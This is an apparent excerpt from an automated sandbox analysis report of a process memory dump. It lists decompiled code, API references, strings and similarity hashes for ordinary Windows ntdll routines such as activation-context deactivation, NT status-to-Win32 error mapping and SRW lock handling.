RtlIpv6StringToAddressW.1105(?,?,00000000,00000000), ref: 6AB60BAA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressIpv6String
String ID:
API String ID: 27538981-0
Opcode ID: b690b3803644220c55924738faed87d42b98be9f139281c8459cf90186e800ac
Instruction ID: a9df763236a459ca2b41e3572a4aa50efa8c41ba13ddcaee7c9b3b46138c4105
Opcode Fuzzy Hash: b690b3803644220c55924738faed87d42b98be9f139281c8459cf90186e800ac
Instruction Fuzzy Hash: 63616A72A843819BEB24CA65CC41BBE73B1DF12328F1AC16AE451EB2D4EF75C540EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB820A0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6AB820A0(intOrPtr* __ecx) {
				signed int _v0;
				signed int _v8;
				signed char _v60;
				signed int* _v64;
				signed char _v68;
				signed int* _v72;
				intOrPtr _v76;
				signed int* _v84;
				signed int* _v88;
				char _v92;
				signed int _v96;
				signed char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t111;
				void* _t133;
				signed char _t134;
				signed int* _t135;
				signed int* _t136;
				signed char _t138;
				signed int* _t142;
				signed int* _t144;
				void* _t145;
				intOrPtr* _t147;
				void* _t149;
				signed int _t152;
				signed int _t154;

				_t154 = (_t152 & 0xfffffff8) - 0x64;
				_v8 =  *0x6ac5d360 ^ _t154;
				_t144 =  *( *[fs:0x18] + 0x1a8);
				_t147 = __ecx;
				if(_t144 == 0) {
					_t142 = 0;
				} else {
					_t142 =  *_t144;
				}
				_t138 =  *(_t147 + 0x10);
				if((_t138 & 0x00000040) != 0) {
					_v84 = 0;
					_v76 = 3;
					_v72 = 0;
					_v68 = _t147 + 8;
					_v64 =  *_t144;
					_push( &_v92);
					_v92 = 0xc0150011;
					_v88 = 0;
					_t104 = E6ABBDEF0(_t138, _t142);
					goto L12;
				} else {
					if((_t138 & 0x00000020) == 0) {
						_v84 = 0;
						_v76 = 3;
						_v72 = 0;
						_v68 = _t147 + 8;
						_v64 =  *_t144;
						_v92 = 0xc0150010;
						L25:
						_v88 = 1;
						_push( &_v92);
						_t104 = E6ABBDEF0(_t138, _t142);
						L12:
						_pop(_t145);
						_pop(_t149);
						_pop(_t133);
						return E6ABAB640(_t104, _t133, _v0 ^ _t154, _t142, _t145, _t149);
					}
					_t104 = _t138 & 0x00000060;
					if((_t138 & 0x00000060) != 0x20) {
						_v84 = 0;
						_v76 = 4;
						_v72 = _t144;
						_v68 = _t142;
						_v64 = _t147 + 8;
						_v60 = _t138;
						_v92 = 0xc0150014;
						goto L25;
					}
					if( *_t147 < 0x24) {
						L8:
						if(_t142 != 0) {
							_t134 = _t142[2];
							_t104 = _t134 & 0x00000070;
							if((_t134 & 0x00000070) != 0x20) {
								L28:
								_v84 = 0;
								_v76 = 4;
								_v72 = _t144;
								_v68 = _t142;
								_v64 = _t142;
								_v60 = _t142[2];
								_v92 = 0xc0150014;
								goto L25;
							}
							if((_t134 & 0x00000008) != 0 ||  *((intOrPtr*)(_t142 - 8)) < 0x24) {
								goto L9;
							} else {
								if(_t142[3] !=  !( *_t142)) {
									goto L28;
								}
								_t104 =  !(_t142[1]);
								if(_t142[4] ==  !(_t142[1])) {
									goto L9;
								}
								goto L28;
							}
						}
						L9:
						if((_t138 & 0x00000010) == 0) {
							_t27 = _t147 + 8; // 0x2c
							_t135 = _t27;
							if(_t142 != _t135) {
								_t111 =  *_t144;
								_push(_t135);
								_push(_t111);
								_v100 = _t111;
								_v96 =  *_t135;
								E6ABF5720(0x33, 2, "SXS: %s() Active frame is not the frame being deactivated %p != %p\n", "RtlDeactivateActivationContextUnsafeFast");
								_t138 = _v100;
								_t154 = _t154 + 0x18;
								_t142 = 0;
								if(_t138 == 0) {
									L36:
									_v84 = 0;
									_v76 = 3;
									_v72 = _t142;
									_v68 = _t135;
									_v64 =  *_t144;
									if(_t138 == 0) {
										_v92 = 0xc0150010;
										_v88 = 1;
									} else {
										_v88 = 0;
										_v92 = (0 | _t142 == 0x00000000) * 2 - 0x3feafff1;
									}
									_push( &_v92);
									E6ABBDEF0(_t138, _t142);
									goto L20;
								}
								while(_t138 != _v96) {
									if(( *(_t138 + 8) & 0x00000070) != 0x20 || ( *(_t138 + 8) & 0x00000008) == 0 && ( *((intOrPtr*)(_t138 + 0xc)) !=  !( *_t138) ||  *((intOrPtr*)(_t138 + 0x10)) !=  !( *(_t138 + 4)))) {
										_v84 = 0;
										_v76 = 4;
										_v72 = _t144;
										_v68 = _t138;
										_v64 = _t135;
										_v60 =  *(_t138 + 8);
										_v92 = 0xc0150014;
										goto L25;
									} else {
										_t138 =  *_t138;
										_t142 =  &(_t142[0]);
										if(_t138 != 0) {
											continue;
										}
										goto L36;
									}
								}
								goto L36;
							}
							L20:
							_t104 =  *_t135;
							 *_t144 =  *_t135;
						}
						 *(_t147 + 0x10) =  *(_t147 + 0x10) | 0x00000040;
						if( *_t147 >= 0x24) {
							_t104 = _v0;
							 *(_t147 + 0x20) = _v0;
						}
						goto L12;
					}
					_t9 = _t147 + 8; // 0x2c
					_t136 = _t9;
					if( *((intOrPtr*)(_t147 + 0x14)) !=  !( *(_t147 + 8))) {
						L27:
						_v84 = 0;
						_v76 = 4;
						_v72 = _t144;
						_v68 = _t142;
						_v64 = _t136;
						_v60 = _t138;
						_v92 = 0xc0150014;
						goto L25;
					}
					_t104 =  !( *(_t147 + 0xc));
					if( *((intOrPtr*)(_t147 + 0x18)) !=  !( *(_t147 + 0xc))) {
						goto L27;
					}
					goto L8;
				}
			}

0x6ab820a8
0x6ab820b2
0x6ab820bf
0x6ab820c5
0x6ab820c9
0x6abccfc8
0x6ab820cf
0x6ab820cf
0x6ab820cf
0x6ab820d1
0x6ab820d7
0x6abccfd2
0x6abccfda
0x6abccfe2
0x6abccfea
0x6abccff0
0x6abccff8
0x6abccff9
0x6abcd001
0x6abcd009
0x00000000
0x6ab820dd
0x6ab820e0
0x6abcd016
0x6abcd01e
0x6abcd026
0x6abcd02e
0x6abcd034
0x6abcd038
0x6abcd06d
0x6abcd071
0x6abcd079
0x6abcd07a
0x6ab8212e
0x6ab82132
0x6ab82133
0x6ab82134
0x6ab8213f
0x6ab8213f
0x6ab820e8
0x6ab820ec
0x6abcd087
0x6abcd08f
0x6abcd097
0x6abcd09b
0x6abcd09f
0x6abcd0a3
0x6abcd0a7
0x00000000
0x6abcd0a7
0x6ab820f5
0x6ab82116
0x6ab82118
0x6ab82140
0x6ab82145
0x6ab82149
0x6abcd0db
0x6abcd0db
0x6abcd0e3
0x6abcd0eb
0x6abcd0ef
0x6abcd0f3
0x6abcd0fa
0x6abcd0fe
0x00000000
0x6abcd0fe
0x6ab82152
0x00000000
0x6ab8215a
0x6ab82161
0x00000000
0x00000000
0x6ab8216a
0x6ab8216f
0x00000000
0x00000000
0x00000000
0x6ab82171
0x6ab82152
0x6ab8211a
0x6ab8211d
0x6ab82176
0x6ab82176
0x6ab8217b
0x6abcd10b
0x6abcd10f
0x6abcd110
0x6abcd11f
0x6abcd123
0x6abcd127
0x6abcd12c
0x6abcd130
0x6abcd133
0x6abcd137
0x6abcd174
0x6abcd174
0x6abcd17c
0x6abcd184
0x6abcd188
0x6abcd18e
0x6abcd194
0x6abcd1b2
0x6abcd1ba
0x6abcd196
0x6abcd198
0x6abcd1ac
0x6abcd1ac
0x6abcd1c6
0x6abcd1c7
0x00000000
0x6abcd1c7
0x6abcd139
0x6abcd146
0x6abcd042
0x6abcd04a
0x6abcd052
0x6abcd056
0x6abcd05a
0x6abcd061
0x6abcd065
0x00000000
0x6abcd16d
0x6abcd16d
0x6abcd16f
0x6abcd172
0x00000000
0x00000000
0x00000000
0x6abcd172
0x6abcd146
0x00000000
0x6abcd139
0x6ab82181
0x6ab82181
0x6ab82183
0x6ab82183
0x6ab8211f
0x6ab82126
0x6ab82128
0x6ab8212b
0x6ab8212b
0x00000000
0x6ab82126
0x6ab820fa
0x6ab820fa
0x6ab82102
0x6abcd0b1
0x6abcd0b1
0x6abcd0b9
0x6abcd0c1
0x6abcd0c5
0x6abcd0c9
0x6abcd0cd
0x6abcd0d1
0x00000000
0x6abcd0d1
0x6ab8210b
0x6ab82110
0x00000000
0x00000000
0x00000000
0x6ab82110

APIs

RtlRaiseException.1105(?), ref: 6ABCD009
RtlRaiseException.1105(C0150010), ref: 6ABCD07A
DbgPrintEx.1105(00000033,00000002,SXS: %s() Active frame is not the frame being deactivated %p != %p,RtlDeactivateActivationContextUnsafeFast,?,0000002C,?,00000000,000000FF), ref: 6ABCD127
RtlRaiseException.1105(C0150010), ref: 6ABCD1C7

Strings

RtlDeactivateActivationContextUnsafeFast, xrefs: 6ABCD111
SXS: %s() Active frame is not the frame being deactivated %p != %p, xrefs: 6ABCD116

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$Print
String ID: RtlDeactivateActivationContextUnsafeFast$SXS: %s() Active frame is not the frame being deactivated %p != %p
API String ID: 3901562751-4142264681
Opcode ID: 9e2bf4217a56150c8a0742be191b1a8903c51236bf0443ff042be02437c19b30
Instruction ID: 0c735a36eedc5dc629c37bc5a3b58bd402e3e4eb9d530c45f6e7145674c0e868
Opcode Fuzzy Hash: 9e2bf4217a56150c8a0742be191b1a8903c51236bf0443ff042be02437c19b30
Instruction Fuzzy Hash: FF8146B4548381DFD350CF19C090B0AFBE0FB88348F104A2EF59A9B251EB75D586EB82

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6CCC0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E6AB6CCC0(signed short _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _t36;
				signed short _t39;
				signed int _t46;
				signed int _t55;
				intOrPtr _t57;
				unsigned int _t67;
				intOrPtr _t70;
				signed int _t79;
				void* _t84;
				void* _t90;
				signed int _t92;
				void* _t93;

				_push(0xfffffffe);
				_push(0x6ac3f828);
				_push(0x6abb17f0);
				_push( *[fs:0x0]);
				_t36 =  *0x6ac5d360;
				_v12 = _v12 ^ _t36;
				_push(_t36 ^ _t92);
				 *[fs:0x0] =  &_v20;
				_v28 = _t93 - 0xc;
				_t57 =  *[fs:0x18];
				if(_t57 == 0) {
					_t39 = _a4;
				} else {
					_v8 = 0;
					_t39 = _a4;
					 *(_t57 + 0xbf4) = _t39;
					_v8 = 0xfffffffe;
				}
				if(_t39 == 0) {
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					if(_t39 == 0x103) {
						 *[fs:0x0] = _v20;
						return 0x3e5;
					} else {
						if((_t39 & 0x20000000) != 0) {
							L16:
							 *[fs:0x0] = _v20;
							return _t39;
						} else {
							if((_t39 & 0x00ff0000) == 0x70000) {
								_t67 = _t39 >> 0x18;
								if(_t67 != 0xc0) {
									if(_t67 != 0x80) {
										goto L6;
									} else {
										goto L21;
									}
								} else {
									goto L21;
								}
							} else {
								L6:
								if((_t39 & 0xf0000000) == 0xd0000000) {
									_t39 = _t39 & 0xcfffffff;
								}
								_t90 = 0;
								_t84 = 0x11e;
								do {
									_t79 = _t84 + _t90 >> 1;
									_t70 =  *((intOrPtr*)(0x6ab4a300 + _t79 * 8));
									_t55 = _t39 - _t70;
									if(_t39 < _t70) {
										_t84 = _t79 - 1;
										goto L11;
									} else {
										if(_t55 < ( *(0x6ab4a304 + _t79 * 8) & 0x000000ff)) {
											_t46 =  *(0x6ab4a306 + _t79 * 8) & 0x0000ffff;
											if( *((char*)(0x6ab4a305 + _t79 * 8)) != 1) {
												_t39 = ( *(0x6ab48692 + (_t46 + _t55 * 2) * 2) & 0x0000ffff) << 0x00000010 |  *(0x6ab48690 + (_t46 + _t55 * 2) * 2) & 0x0000ffff;
											} else {
												_t39 =  *(0x6ab48690 + (_t46 + _t55) * 2) & 0x0000ffff;
											}
											goto L16;
										} else {
											_t90 = _t79 + 1;
											goto L11;
										}
									}
									goto L28;
									L11:
								} while (_t90 <= _t84);
								if((_t39 & 0xffff0000) == 0xc0010000) {
									L21:
									 *[fs:0x0] = _v20;
									return _t39 & 0x0000ffff;
								} else {
									E6AB6B150("RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping\n", _t39);
									E6AB6B150();
									E6AB6B150("RTL: ERROR_MR_MID_NOT_FOUND is being returned\n", "RTL: Edit ntos\\rtl\\generr.c to correct the problem\n");
									_t39 = 0x13d;
									goto L16;
								}
							}
						}
					}
				}
				L28:
			}

0x6ab6ccc5
0x6ab6ccc7
0x6ab6cccc
0x6ab6ccd7
0x6ab6ccde
0x6ab6cce3
0x6ab6cce8
0x6ab6ccec
0x6ab6ccf2
0x6ab6ccf5
0x6ab6ccfe
0x6abc4dc8
0x6ab6cd04
0x6ab6cd04
0x6ab6cd0b
0x6ab6cd0e
0x6ab6cd14
0x6ab6cd14
0x6ab6cd1d
0x6ab6cdca
0x6ab6cdd8
0x6ab6cd23
0x6ab6cd28
0x6ab6cde3
0x6ab6cdf1
0x6ab6cd2e
0x6ab6cd33
0x6ab6cdb1
0x6ab6cdb4
0x6ab6cdc2
0x6ab6cd35
0x6ab6cd43
0x6ab6ce10
0x6ab6ce19
0x6abc4dd6
0x00000000
0x6abc4ddc
0x00000000
0x6abc4ddc
0x00000000
0x00000000
0x00000000
0x6ab6cd49
0x6ab6cd49
0x6ab6cd57
0x6abc4de1
0x6abc4de1
0x6ab6cd5d
0x6ab6cd5f
0x6ab6cd64
0x6ab6cd67
0x6ab6cd69
0x6ab6cd72
0x6ab6cd76
0x6ab6cd90
0x00000000
0x6ab6cd78
0x6ab6cd82
0x6ab6cd95
0x6ab6cda5
0x6ab6ce0a
0x6ab6cda7
0x6ab6cda9
0x6ab6cda9
0x00000000
0x6ab6cd84
0x6ab6cd84
0x00000000
0x6ab6cd84
0x6ab6cd82
0x00000000
0x6ab6cd87
0x6ab6cd87
0x6abc4df9
0x6ab6ce1f
0x6ab6ce25
0x6ab6ce33
0x6abc4dff
0x6abc4e05
0x6abc4e0f
0x6abc4e1c
0x6abc4e24
0x00000000
0x6abc4e24
0x6abc4df9
0x6ab6cd43
0x6ab6cd33
0x6ab6cd28
0x00000000

APIs

DbgPrint.1105(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,-00000F38,00000000,?,?), ref: 6ABC4E05
DbgPrint.1105(RTL: Edit ntos\rtl\generr.c to correct the problem,?,?,?,-00000F38,00000000,?,?), ref: 6ABC4E0F
DbgPrint.1105(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,-00000F38,00000000,?,?), ref: 6ABC4E1C

Strings

RTL: ERROR_MR_MID_NOT_FOUND is being returned, xrefs: 6ABC4E17
RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping, xrefs: 6ABC4E00
RTL: Edit ntos\rtl\generr.c to correct the problem, xrefs: 6ABC4E0A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: RTL: ERROR_MR_MID_NOT_FOUND is being returned$RTL: Edit ntos\rtl\generr.c to correct the problem$RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping
API String ID: 3558298466-1070408152
Opcode ID: a0722c092c6c4567b9246ab42a951a45439e55a47bcb4b929d0ebb053b5a63b4
Instruction ID: c94e5febc5d57b7f5fa800779efea701cb7d2df61085a600106a54af4b80afe8
Opcode Fuzzy Hash: a0722c092c6c4567b9246ab42a951a45439e55a47bcb4b929d0ebb053b5a63b4
Instruction Fuzzy Hash: 404128B6A082949ADB14CF58E850BB9B7B5F746310F00023EE611D7784EF396870E691

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9645B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E6AB9645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void _v60;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				int _t56;
				void* _t69;
				int _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x6ac5d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				memset( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E6AB82280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E6AB7FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x6ac5b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E6ABAB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x6ab9645b
0x6ab96463
0x6ab9646d
0x6ab96475
0x6ab9647a
0x6ab9647e
0x6ab96480
0x6ab9648c
0x6ab96490
0x6ab96495
0x6ab96498
0x6ab9649b
0x6ab9649f
0x6ab964a1
0x6abd7c07
0x6abd7c09
0x6abd7c0c
0x00000000
0x6ab964a7
0x6ab964a7
0x6ab964aa
0x6abd7bf7
0x6abd7c00
0x00000000
0x6abd7bf9
0x6abd7bf9
0x6abd7bf9
0x6ab964b0
0x6ab964b0
0x6ab964b2
0x6ab964b2
0x6ab964b3
0x6ab964ba
0x6ab96553
0x6ab9655e
0x6ab96566
0x6ab9656c
0x6ab96575
0x6ab9657f
0x6ab96585
0x6ab96588
0x6ab96588
0x6ab964c7
0x6ab964cb
0x6ab964ce
0x6ab964d3
0x6ab964da
0x6ab964e5
0x6ab964ed
0x6ab964f1
0x6ab964f5
0x6ab964f6
0x6ab964fa
0x6ab96502
0x6ab96503
0x6ab96504
0x6ab96507
0x6ab9651a
0x6ab96524
0x6ab96524
0x6ab96526
0x6ab96526
0x6ab964aa
0x6ab9652c
0x6ab9652d
0x6ab9652e
0x6ab96539

APIs

memset.1105(?,00000000,00000030,?,?,00000000), ref: 6AB96490
RtlDebugPrintTimes.1105(?,00000030,00000030,00000030), ref: 6AB9651A
RtlAcquireSRWLockExclusive.1105(?,?,?,00000000), ref: 6AB96553
RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000), ref: 6AB96588

Strings

0, xrefs: 6AB964E5
0, xrefs: 6AB964FA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireDebugPrintReleaseTimesmemset
String ID: 0$0
API String ID: 3207447552-203156872
Opcode ID: a9ac14a62f0f8ae672f504265e9f6c84d90873aeea74eb6d307cee62b38f620d
Instruction ID: 9ab4624ad8c96e783754fc2c37a3adf77a60c54511c6efcf8d217fee43bbc448
Opcode Fuzzy Hash: a9ac14a62f0f8ae672f504265e9f6c84d90873aeea74eb6d307cee62b38f620d
Instruction Fuzzy Hash: 524159B16087469FC340CF28C454A5ABBE4FF8A718F05456EF588DB301EB71EA45DB86

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64510, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6AB64510(signed int _a4) {
				signed int _t25;
				unsigned int _t28;
				intOrPtr _t32;
				signed int _t40;
				void* _t46;
				signed int _t47;
				signed int _t52;
				void* _t53;
				signed int _t55;

				_t47 = _a4;
				if(_t47 == 0) {
					return 0;
				}
				if(_t47 == 0x103) {
					return 0x3e5;
				}
				_t25 = _t47;
				if((_t47 & 0x20000000) == 0) {
					if((_t25 & 0x00ff0000) == 0x70000) {
						_t28 = _t47 >> 0x18;
						if(_t28 == 0xc0 || _t28 == 0x80) {
							L20:
							return _t47 & 0x0000ffff;
						} else {
							goto L4;
						}
					}
					L4:
					if((_t47 & 0xf0000000) == 0xd0000000) {
						_t47 = _t47 & 0xcfffffff;
					}
					_t53 = 0;
					_t46 = 0x11e;
					do {
						_t52 = _t46 + _t53 >> 1;
						_t32 =  *((intOrPtr*)(0x6ab4a300 + _t52 * 8));
						_t55 = _t47 - _t32;
						if(_t47 < _t32) {
							_t46 = _t52 - 1;
							goto L10;
						}
						if(_t55 < ( *(0x6ab4a304 + _t52 * 8) & 0x000000ff)) {
							_t40 =  *(0x6ab4a306 + _t52 * 8) & 0x0000ffff;
							if( *((char*)(0x6ab4a305 + _t52 * 8)) != 1) {
								return ( *(0x6ab48692 + (_t40 + _t55 * 2) * 2) & 0x0000ffff) << 0x00000010 |  *(0x6ab48690 + (_t40 + _t55 * 2) * 2) & 0x0000ffff;
							}
							return  *(0x6ab48690 + (_t40 + _t55) * 2) & 0x0000ffff;
						}
						_t53 = _t52 + 1;
						L10:
					} while (_t53 <= _t46);
					if((_t47 & 0xffff0000) == 0xc0010000) {
						goto L20;
					}
					E6AB6B150("RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping\n", _t47);
					E6AB6B150();
					E6AB6B150("RTL: ERROR_MR_MID_NOT_FOUND is being returned\n", "RTL: Edit ntos\\rtl\\generr.c to correct the problem\n");
					return 0x13d;
				}
				return _t25;
			}

0x6ab64515
0x6ab6451d
0x00000000
0x6ab645b6
0x6ab64529
0x00000000
0x6abc08b5
0x6ab6452f
0x6ab64537
0x6ab64543
0x6abc08c1
0x6abc08c9
0x6abc08d6
0x00000000
0x00000000
0x00000000
0x00000000
0x6abc08c9
0x6ab64549
0x6ab64555
0x6ab645ba
0x6ab645ba
0x6ab64557
0x6ab64559
0x6ab6455e
0x6ab64563
0x6ab64565
0x6ab6456c
0x6ab64570
0x6ab64583
0x00000000
0x6ab64583
0x6ab6457c
0x6ab64597
0x6ab6459f
0x00000000
0x6abc092f
0x00000000
0x6ab645a7
0x6ab6457e
0x6ab64586
0x6ab64586
0x6abc08ea
0x00000000
0x00000000
0x6abc08f2
0x6abc08fc
0x6abc0909
0x00000000
0x6abc090f
0x6ab645b3

APIs

DbgPrint.1105(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?), ref: 6ABC08F2
DbgPrint.1105(RTL: Edit ntos\rtl\generr.c to correct the problem,RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?), ref: 6ABC08FC
DbgPrint.1105(RTL: ERROR_MR_MID_NOT_FOUND is being returned), ref: 6ABC0909

Strings

RTL: ERROR_MR_MID_NOT_FOUND is being returned, xrefs: 6ABC0904
RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping, xrefs: 6ABC08ED
RTL: Edit ntos\rtl\generr.c to correct the problem, xrefs: 6ABC08F7

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: RTL: ERROR_MR_MID_NOT_FOUND is being returned$RTL: Edit ntos\rtl\generr.c to correct the problem$RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping
API String ID: 3558298466-1070408152
Opcode ID: 7538c2646e41f2a5e927e87a3d66da35087cd6ec34ce048ebac4974cc60b50e9
Instruction ID: e00fa36afd82dda39433809b36ad46493ab742086e13ae3c7c867b592a8eadd9
Opcode Fuzzy Hash: 7538c2646e41f2a5e927e87a3d66da35087cd6ec34ce048ebac4974cc60b50e9
Instruction Fuzzy Hash: BE219A736285915AF724671C9C70B7833A6F301304F011226F211D76CAEF59C9D0F6E2

Uniqueness

Uniqueness Score: -1.00%

Function 6AB65320, Relevance: 9.1, APIs: 6, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC585F0), ref: 6AB65362
RtlClearBits.1105(?,?,00000001,6AC585F0), ref: 6AB6538E
RtlAcquireSRWLockExclusive.1105(?,?,?,00000001,6AC585F0), ref: 6AB653A7

Part of subcall function 6AB82280: RtlDllShutdownInProgress.1105(00000000), ref: 6AB822BA
Part of subcall function 6AB82280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6AB823A3

RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000001,6AC585F0), ref: 6AB653F2
RtlReleaseSRWLockExclusive.1105(6AC585F0,6AC585F0), ref: 6AB65400
RtlDebugPrintTimes.1105(?,?,?,?,00000001,6AC585F0), ref: 6AB65422

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireRelease$AlertBitsClearDebugPrintProgressShutdownThreadTimesWait
String ID:
API String ID: 3225401293-0
Opcode ID: 739fac9f2e71c66926ed84f014830f79f4515990e33d160f2b9d10fea168774c
Instruction ID: 5683585e7f774e70b3d6033c22d0c5591337e8ec72daa17584b4887f2959f497
Opcode Fuzzy Hash: 739fac9f2e71c66926ed84f014830f79f4515990e33d160f2b9d10fea168774c
Instruction Fuzzy Hash: E031E172246381AFC710CF28C484A5EB3A4FF45714F4616ACE8568F243DF30E825DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6AB70225, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6AB70315: memcpy.1105(6AC57C54,?,00000040,00000000,00000000,000000FF,?,?,6AB70254,6AC3F868,00000038,6AB6F563), ref: 6AB70371
